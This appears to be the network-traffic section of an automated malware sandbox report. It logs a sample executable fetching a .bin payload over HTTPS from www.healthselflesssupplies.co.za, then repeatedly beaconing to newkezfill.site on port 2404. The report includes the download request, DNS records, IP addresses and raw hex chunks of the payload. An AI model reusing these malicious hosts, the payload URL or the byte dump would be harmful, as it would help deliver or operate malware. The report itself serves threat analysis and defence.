Jan 8, 2025 15:08:33.438790083 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.438805103 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.438857079 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.438857079 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.438864946 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.438898087 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.441665888 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.441685915 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.441715956 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.441723108 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.441760063 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.441780090 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.442013025 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.442028046 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.442064047 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.442070961 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.442082882 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.442110062 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.524682045 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.524699926 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.524739981 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.524749041 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.524772882 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.524805069 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.524991989 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.525007963 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.525032997 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.525039911 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.525062084 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.525084972 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.525311947 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.525326014 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.525367975 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.525373936 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.525383949 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.525407076 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.525532961 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.525547028 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.525583029 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.525588989 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.525609970 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.525624037 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.526671886 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.526688099 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.526730061 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.526736975 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.526762009 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.526781082 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.527061939 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.527080059 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.527117968 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.527124882 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.527151108 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.527163029 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.661278963 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.661298990 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.661379099 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.661398888 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.661438942 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.661746025 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.661761045 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.661806107 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.661813974 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.661853075 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.662117958 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.662133932 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.662169933 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.662178040 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.662214041 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.662225962 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.662234068 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.662250996 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.662266016 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:33.662271976 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.662308931 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.665849924 CET	49794	443	192.168.2.7	164.160.91.32
Jan 8, 2025 15:08:33.665864944 CET	443	49794	164.160.91.32	192.168.2.7
Jan 8, 2025 15:08:36.382961035 CET	49830	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:08:36.387780905 CET	2404	49830	87.120.84.23	192.168.2.7
Jan 8, 2025 15:08:36.387855053 CET	49830	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:08:36.393419981 CET	49830	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:08:36.398201942 CET	2404	49830	87.120.84.23	192.168.2.7
Jan 8, 2025 15:08:57.737471104 CET	2404	49830	87.120.84.23	192.168.2.7
Jan 8, 2025 15:08:57.740104914 CET	49830	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:08:57.740163088 CET	49830	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:08:57.744980097 CET	2404	49830	87.120.84.23	192.168.2.7
Jan 8, 2025 15:08:58.755501986 CET	49969	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:08:58.760993004 CET	2404	49969	87.120.84.23	192.168.2.7
Jan 8, 2025 15:08:58.761100054 CET	49969	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:08:58.764600039 CET	49969	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:08:58.769428015 CET	2404	49969	87.120.84.23	192.168.2.7
Jan 8, 2025 15:09:20.148286104 CET	2404	49969	87.120.84.23	192.168.2.7
Jan 8, 2025 15:09:20.148425102 CET	49969	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:09:20.148478985 CET	49969	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:09:20.153239965 CET	2404	49969	87.120.84.23	192.168.2.7
Jan 8, 2025 15:09:21.152740002 CET	49972	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:09:21.157690048 CET	2404	49972	87.120.84.23	192.168.2.7
Jan 8, 2025 15:09:21.157773018 CET	49972	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:09:21.161396027 CET	49972	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:09:21.166158915 CET	2404	49972	87.120.84.23	192.168.2.7
Jan 8, 2025 15:09:42.537499905 CET	2404	49972	87.120.84.23	192.168.2.7
Jan 8, 2025 15:09:42.537707090 CET	49972	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:09:42.537707090 CET	49972	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:09:42.542577028 CET	2404	49972	87.120.84.23	192.168.2.7
Jan 8, 2025 15:09:43.542901039 CET	49973	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:09:43.547833920 CET	2404	49973	87.120.84.23	192.168.2.7
Jan 8, 2025 15:09:43.548105001 CET	49973	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:09:43.551271915 CET	49973	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:09:43.556032896 CET	2404	49973	87.120.84.23	192.168.2.7
Jan 8, 2025 15:10:04.942087889 CET	2404	49973	87.120.84.23	192.168.2.7
Jan 8, 2025 15:10:04.942337990 CET	49973	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:10:04.942337990 CET	49973	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:10:04.947292089 CET	2404	49973	87.120.84.23	192.168.2.7
Jan 8, 2025 15:10:05.952302933 CET	49974	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:10:05.957426071 CET	2404	49974	87.120.84.23	192.168.2.7
Jan 8, 2025 15:10:05.958089113 CET	49974	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:10:05.961296082 CET	49974	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:10:05.966048002 CET	2404	49974	87.120.84.23	192.168.2.7
Jan 8, 2025 15:10:27.348728895 CET	2404	49974	87.120.84.23	192.168.2.7
Jan 8, 2025 15:10:27.348793983 CET	49974	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:10:27.348865032 CET	49974	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:10:27.353610992 CET	2404	49974	87.120.84.23	192.168.2.7
Jan 8, 2025 15:10:28.355660915 CET	49975	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:10:28.360791922 CET	2404	49975	87.120.84.23	192.168.2.7
Jan 8, 2025 15:10:28.363091946 CET	49975	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:10:28.366328955 CET	49975	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:10:28.371151924 CET	2404	49975	87.120.84.23	192.168.2.7
Jan 8, 2025 15:10:49.739963055 CET	2404	49975	87.120.84.23	192.168.2.7
Jan 8, 2025 15:10:49.740017891 CET	49975	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:10:49.740067959 CET	49975	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:10:49.744821072 CET	2404	49975	87.120.84.23	192.168.2.7
Jan 8, 2025 15:10:50.746145010 CET	49976	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:10:50.750972986 CET	2404	49976	87.120.84.23	192.168.2.7
Jan 8, 2025 15:10:50.752094030 CET	49976	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:10:50.755340099 CET	49976	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:10:50.760122061 CET	2404	49976	87.120.84.23	192.168.2.7
Jan 8, 2025 15:11:12.134258032 CET	2404	49976	87.120.84.23	192.168.2.7
Jan 8, 2025 15:11:12.134329081 CET	49976	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:11:12.134382010 CET	49976	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:11:12.139101982 CET	2404	49976	87.120.84.23	192.168.2.7
Jan 8, 2025 15:11:13.136768103 CET	49977	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:11:13.141711950 CET	2404	49977	87.120.84.23	192.168.2.7
Jan 8, 2025 15:11:13.141803980 CET	49977	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:11:13.147056103 CET	49977	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:11:13.151803970 CET	2404	49977	87.120.84.23	192.168.2.7
Jan 8, 2025 15:11:34.521817923 CET	2404	49977	87.120.84.23	192.168.2.7
Jan 8, 2025 15:11:34.522128105 CET	49977	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:11:34.522166014 CET	49977	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:11:34.526972055 CET	2404	49977	87.120.84.23	192.168.2.7
Jan 8, 2025 15:11:35.527493954 CET	49978	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:11:35.532516956 CET	2404	49978	87.120.84.23	192.168.2.7
Jan 8, 2025 15:11:35.532607079 CET	49978	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:11:35.535697937 CET	49978	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:11:35.540522099 CET	2404	49978	87.120.84.23	192.168.2.7
Jan 8, 2025 15:11:56.881239891 CET	2404	49978	87.120.84.23	192.168.2.7
Jan 8, 2025 15:11:56.881423950 CET	49978	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:11:56.881423950 CET	49978	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:11:56.886231899 CET	2404	49978	87.120.84.23	192.168.2.7
Jan 8, 2025 15:11:57.886930943 CET	49979	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:11:57.891810894 CET	2404	49979	87.120.84.23	192.168.2.7
Jan 8, 2025 15:11:57.892005920 CET	49979	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:11:57.895464897 CET	49979	2404	192.168.2.7	87.120.84.23
Jan 8, 2025 15:11:57.900221109 CET	2404	49979	87.120.84.23	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 15:08:30.427639008 CET	59949	53	192.168.2.7	1.1.1.1
Jan 8, 2025 15:08:30.852288008 CET	53	59949	1.1.1.1	192.168.2.7
Jan 8, 2025 15:08:36.369961977 CET	54239	53	192.168.2.7	1.1.1.1
Jan 8, 2025 15:08:36.381737947 CET	53	54239	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 15:08:30.427639008 CET	192.168.2.7	1.1.1.1	0xa9b3	Standard query (0)	www.healthselflesssupplies.co.za	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:08:36.369961977 CET	192.168.2.7	1.1.1.1	0xa273	Standard query (0)	newkezfill.site	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 15:08:30.852288008 CET	1.1.1.1	192.168.2.7	0xa9b3	No error (0)	www.healthselflesssupplies.co.za	healthselflesssupplies.co.za		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 15:08:30.852288008 CET	1.1.1.1	192.168.2.7	0xa9b3	No error (0)	healthselflesssupplies.co.za		164.160.91.32	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:08:36.381737947 CET	1.1.1.1	192.168.2.7	0xa273	No error (0)	newkezfill.site		87.120.84.23	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.healthselflesssupplies.co.za

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49794	164.160.91.32	443	6596	C:\Users\user\Desktop\KO0q4biYfC.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:08:31 UTC	198	OUT	GET /PLBVeySxbfKXMM176.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: www.healthselflesssupplies.co.za Cache-Control: no-cache
2025-01-08 14:08:32 UTC	404	IN	HTTP/1.1 200 OK Connection: close content-type: application/octet-stream last-modified: Wed, 04 Dec 2024 06:06:53 GMT accept-ranges: bytes content-length: 493120 date: Wed, 08 Jan 2025 14:08:32 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2025-01-08 14:08:32 UTC	16384	IN	Data Raw: ed 33 dd 90 0e a3 86 65 a7 4a a6 c2 24 43 14 fd aa f5 4e fc 39 c3 65 0a cf aa fe 4a 5f e0 02 fc 9b 0d d4 0f 88 79 78 14 3a 1c be 90 54 b8 1a 43 70 a3 17 fa b8 05 c5 6b d4 4f 78 25 b1 ec 56 62 47 18 5f 92 f1 4e a2 bd b3 56 08 88 82 dc 50 cd 56 b1 74 ef 52 62 eb ca 4f 2b 3a f8 66 19 26 d0 c3 2e b5 e4 8f c1 0a f8 a9 3d 2f 1c b5 56 5a 1a 52 be bc 08 cf 79 b6 f5 00 8d cf 3f ad 2f 72 eb c2 30 c9 d0 6f 16 5b 91 de f9 4c f2 85 69 fb 5c cb 33 88 64 e9 ec 48 34 75 83 9c 51 df cc 3d d4 95 f9 b5 81 fa fd 17 e7 c8 d4 bf e5 89 df b3 22 3c b7 2d 6b ed 5c 1e 6e bd 37 14 66 e0 4a a7 d2 58 55 f5 c2 a7 d3 81 97 6b 40 d2 67 81 8f 8b 6b 95 b9 64 80 bd 36 6a 0c e6 34 6f b9 01 ac aa 9b 14 32 1c 37 d5 03 ac c1 e9 d6 51 b1 59 a0 99 bd 7b d0 52 2a 0b d8 d3 1b 62 1b 96 06 2f a4 d0 Data Ascii: 3eJ$CN9eJ_yx:TCpkOx%VbG_NVPVtRbO+:f&.=/VZRy?/r0o[Li\3dH4uQ="<-k\n7fJXUk@gkd6j4o27QY{R*b/
2025-01-08 14:08:32 UTC	16384	IN	Data Raw: b8 ca cb 79 e0 0a 74 a9 c7 b4 54 c6 b9 22 33 d0 23 36 97 6b ad a3 a6 18 1d 41 3c 6c a3 bf 6c a8 d0 cc 64 7c 71 84 10 ee ea b9 4f 4a af 6f 1e 26 5c 2a 32 9f b4 76 17 42 a5 e1 c1 1b 2e fd 25 fc 45 e6 c5 51 13 64 12 f1 4a a4 e8 4a f4 87 f3 f7 9b 8e ce 4f a7 9f 58 74 2f 80 b2 2f 69 e1 8d 1a 7f 21 9d b3 5b 25 3e 1f ba b1 66 c0 6b e7 e8 6f 4a d0 24 1d 9d 47 91 19 f3 cb a4 cc 64 8c 19 1c 68 dd e1 1d 0e d2 d8 d3 3f 39 56 13 8a 27 e4 40 da 5f 7b c1 86 66 02 7c 68 ff d9 dc 37 20 ee 28 a7 79 41 32 e2 b6 87 85 db 6c b0 f5 69 09 71 6a c3 7a 06 ad 68 dc 6d 51 72 bd 86 b5 a1 cd b2 27 95 88 56 2d 97 65 1f 96 0b 0d 4d 73 ce 60 87 92 47 fd 29 3d 1d e5 dd dd 6c ac 39 ab a1 cd 93 68 fe 1e 1d f3 d8 42 1e 23 94 f9 58 fa 17 d6 10 39 27 e0 8c a3 40 71 c5 48 4d fc 9f 9f e1 82 77 Data Ascii: ytT"3#6kA<lld\|qOJo&\*2vB.%EQdJJOXt//i![%>fkoJ$Gdh?9V'@_{f\|h7 (yA2liqjzhmQr'V-eMs`G)=l9hB#X9'@qHMw
2025-01-08 14:08:32 UTC	16384	IN	Data Raw: 73 c6 30 ee b1 31 0d 46 e0 65 0d de b5 7a de 22 4e 1d 8f c4 75 c4 b5 a0 24 61 75 1c 0f 34 f1 5c 3f 2b 86 9f 63 ac fe 36 70 b4 c8 54 da 3f c5 5b 55 65 81 d0 0a c0 13 63 60 23 d7 fe 8e c0 a0 59 55 26 1d 5f ca 23 42 61 5d 45 20 e6 1b 30 4c a9 5d d7 1a 20 f3 67 b1 28 b2 13 ce 29 69 2a 47 d7 e0 c2 61 a2 15 a3 33 7f 21 49 fd 40 48 46 8a 10 b3 90 f0 63 0e cb 1c 00 a7 f5 c3 ad 0c f0 d8 77 85 f1 cb bf a0 a3 63 ff 9f eb 77 51 f9 e2 82 c6 d0 36 d4 22 55 eb 27 21 94 ac 87 4c 7e 21 43 d2 09 b4 3a d0 80 eb 24 d1 c1 7d 4e ab 10 97 2b 3a 6e b7 7b b7 0e d3 a7 0b cf 94 c5 51 21 08 ce 1b 9e 36 79 62 e6 27 f5 bc 40 9c ff 6f 99 41 c5 e6 9f f9 5d e4 3f 15 23 00 b5 f1 1b 0b 62 21 76 af 22 f9 5d 4a 3b 94 99 a3 5e a7 2b 99 a9 1d aa be 23 4f 98 31 15 d8 f7 09 cc 4e d2 b9 a2 39 a9 Data Ascii: s01Fez"Nu$au4\?+c6pT?[Uec`#YU&_#Ba]E 0L] g()i*Ga3!I@HFcwcwQ6"U'!L~!C:$}N+:n{Q!6yb'@oA]?#b!v"]J;^+#O1N9
2025-01-08 14:08:32 UTC	16384	IN	Data Raw: 7c ac 5c 34 60 73 88 12 e5 66 0c f0 81 9b 15 86 d7 32 60 de 77 2a 2a eb d8 23 c1 b6 e1 3a 15 21 80 20 27 99 c8 0e 83 b9 34 dc ec 87 e5 00 1a d1 11 06 99 f8 8a d1 48 99 c5 09 ca ac 17 a0 d7 48 94 27 a4 aa e0 5d c9 0e 25 5e fe bb ce 6f b1 36 61 18 e7 27 27 e8 0d a5 46 0a e7 26 b1 d6 96 24 65 05 a3 02 ed 10 9a e6 c9 39 04 aa e4 1e 6d 0b 5e 86 62 3b 4a 27 31 19 9c fa be 4f 73 cc 90 3b a9 26 d4 bc 9a 09 cc b9 08 4a 5c e3 91 b9 ec a6 dc 93 cc 66 53 39 25 4a a9 21 52 09 3f 7c 97 4a 6c 5a aa b7 84 86 7b bc 9b 3e 39 b3 88 a2 1b 55 7b 1c 5f 29 3f 39 a6 ba 59 5d 5a 60 6f 15 d7 07 3e 7a 43 93 b1 07 2f 1b 0f 33 b9 d9 f1 89 80 a1 19 f6 aa aa 90 93 be e7 a0 73 82 55 ee d2 29 cb c5 ad 50 d8 65 81 a0 79 2e ab c4 09 5a 5f e2 df ec c3 18 3d a2 b3 41 ec 37 6e f5 a1 44 8d 79 Data Ascii: \|\4`sf2`w**#:! '4HH']%^o6a''F&$e9m^b;J'1Os;&J\fS9%J!R?\|JlZ{>9U{_)?9Y]Z`o>zC/3sU)Pey.Z_=A7nDy
2025-01-08 14:08:32 UTC	16384	IN	Data Raw: f4 40 0c be 0d 5a f3 7b 13 e2 ac 67 4b ac ec 85 ad 01 b0 0f cc 32 a7 12 f3 31 e5 03 43 52 dc 12 5a 66 53 89 1b 1b ee 50 53 5c b4 a3 30 4d 8d 5f ca e1 3f 77 f2 ae 9c c0 48 a3 8e 19 18 ab 7d a2 d8 2a 2d ac 3c 8a 46 88 12 20 84 77 e3 07 6c 7d fd 0d bc fb d0 bd dd 50 fc 43 2c ce 69 d4 95 d8 80 47 14 93 ae 90 8f 33 6b 3c 15 c7 46 da 88 ad 89 66 74 e2 11 fe 26 20 6a 07 54 a7 b6 8d 43 c5 88 4a e7 e5 97 24 bc 13 6a 5a c7 19 e2 83 94 0b 23 02 ae 55 dc 7c 39 22 47 83 2b 8a e0 28 81 8e d7 a5 b6 c4 ff 26 1f 2a 60 ab 90 a0 d1 b6 b6 9d 07 c9 35 d0 f3 ba fd 12 5f 68 89 ca c5 86 50 82 b2 10 cf 57 9b d8 8b 75 89 13 0f 6c 34 a3 04 e9 7f d0 a7 6c 09 e2 e1 de 0c 3a f9 e3 5c c5 c6 36 e8 fc 2c da 86 b7 2f 5e d1 68 4c 1c 00 8f 2c 8b 41 80 95 6a 8c 9a 54 e5 b4 93 56 c4 e0 7a f8 Data Ascii: @Z{gK21CRZfSPS\0M_?wH}-<F wl}PC,iG3k<Fft& jTCJ$jZ#U\|9"G+(&`5_hPWul4l:\6,/^hL,AjTVz
2025-01-08 14:08:32 UTC	16384	IN	Data Raw: 9e 1f 85 c9 63 ab 1f 0e 8f 4a a4 db 2b 2d b5 98 19 4c a8 33 5d e9 18 29 60 7d f2 68 44 0b 5f ab 3e f8 b3 79 36 95 54 7d 9e 8d 13 54 e2 63 08 5d 42 44 b2 67 94 6f 70 57 96 34 0f 9c 3f 30 1f 83 f6 d0 33 b1 bc 12 13 e3 f1 d1 60 14 ae ba 78 70 e9 1c 32 74 61 02 bd 1b 8f 78 66 ab bd 18 f4 83 f3 8b af d0 0b 21 89 f5 40 e1 ae a6 87 36 8d 4d d7 96 03 84 4d 1f 2e 98 f4 51 63 76 2d 61 a2 0e a3 3e 8c ba 26 dd b4 ef e8 d5 90 34 fa 92 63 be 08 5f 20 02 d8 fc 7d 8e ce e4 42 f9 56 d8 22 27 38 75 39 f5 16 85 9b a7 1c fb b7 33 31 0b c2 bb ec 67 d1 a7 a6 d2 05 f2 1c c5 58 0c 4f 91 29 7f ee 6a d1 69 79 41 11 ce f3 dc d4 7d 3f 41 10 cf 51 82 c3 78 75 da 2d 9e 9d 48 b1 9c ef c9 58 d5 18 8d 21 b5 5f 09 56 dd ea 86 c5 47 39 ef 3a 5f f0 b4 04 70 8d 62 8f 62 06 fc 76 c0 4c e5 dc Data Ascii: cJ+-L3])`}hD_>y6T}Tc]BDgopW4?03`xp2taxf!@6MM.Qcv-a>&4c_ }BV"'8u931gXO)jiyA}?AQxu-HX!_VG9:_pbbvL
2025-01-08 14:08:33 UTC	16384	IN	Data Raw: ec b6 76 b6 c7 e5 e7 b6 8e 0b 96 50 a4 f2 a2 1a 13 3f fb c6 57 ff 24 04 fa 34 fa c2 cb 80 c0 c0 7b 76 4d 46 e2 9b 02 5a 54 e1 c9 be ab 33 4b ee 38 95 9a 95 ce f7 a3 d9 ac 17 15 8a 12 36 60 bc 0f f9 f8 8f 6e 7b 5e 06 09 e5 c0 e4 b5 f2 4a ba 00 c4 6e 11 09 d8 19 7f 04 f0 36 a5 e7 5a 91 db e8 7b 10 44 9a 80 16 13 f2 f8 08 a0 a6 2a 49 ee 59 87 f7 40 f1 a9 b9 e7 51 ee a5 ca 1a d4 d4 f2 37 f6 e1 c5 fb da 12 70 52 7c c6 2b 34 2e 58 c4 b2 eb bf 1b 79 23 c2 76 b0 ee 49 c8 9d 6d c1 14 23 01 4e 53 f6 5e bf d1 f8 50 5a 35 c6 05 f9 75 14 2e 76 d0 bc de 6c 73 07 53 44 e9 6d 6f a6 29 f8 bb a7 fc f1 10 c5 6d 98 47 ae 69 54 fd 33 28 60 78 bf a4 90 00 22 5c c3 dd 9e 39 a3 7b b5 56 2b 7b cb 6d 0a 55 90 5e 2a df df 5c ab 2a d3 06 fe f0 95 34 1e bb 05 ca 10 24 e0 f1 b4 ce 11 Data Ascii: vP?W$4{vMFZT3K86`n{^Jn6Z{DIY@Q7pR\|+4.Xy#vIm#NS^PZ5u.vlsSDmo)mGiT3(`x"\9{V+{mU^\*4$
2025-01-08 14:08:33 UTC	16384	IN	Data Raw: aa 06 00 e0 7b 09 88 85 e9 e5 ca d6 2a fc 1c 81 c4 7a 05 e4 84 c6 63 1a 8c 03 d4 5f eb ca 2b 08 8d 2d d3 2f 3a 56 39 20 a1 bd 51 9e be 20 4e 27 46 0d 1e ad 29 1c c7 45 12 ea 85 22 81 4d d8 e0 72 d0 bf 26 2c ff ed 24 11 01 62 fe 2a d2 a1 84 8d 3b 4f 9d 0a 66 d4 ee 2e 4e b9 f2 b8 6c 14 94 b4 e2 66 c3 a5 c2 df 51 b6 47 27 48 fe 59 73 25 5d f2 f7 aa 13 71 54 d9 1f 5c 6f 4c 5a 07 13 fb 84 de 1a 28 38 63 ca 00 68 cd 5c cc b9 b7 ea ac 2c 7d a9 14 4a f7 a6 0e a3 0d 16 cf ef 7d 05 52 eb ab 14 50 5e c5 db a2 5a 4a 10 d5 f7 98 9c 4f 19 02 ea 72 f0 4f 35 c7 b7 2c 42 a4 37 83 15 b0 4f bd c4 c1 d7 ff ee 53 59 b8 e2 a3 c0 61 90 fd 14 d7 da b2 0b bb 0b d0 0d ea 01 53 2d 06 80 96 bd e5 10 8b 3a 32 46 10 46 9f b9 20 06 4f 99 83 03 bd 84 03 9e c9 f2 95 40 1c f8 23 36 12 40 Data Ascii: {zc_+-/:V9 Q N'F)E"Mr&,$b;Of.NlfQG'HYs%]qT\oLZ(8ch\,}J}RP^ZJOrO5,B7OSYaS-:2FF O@#6@
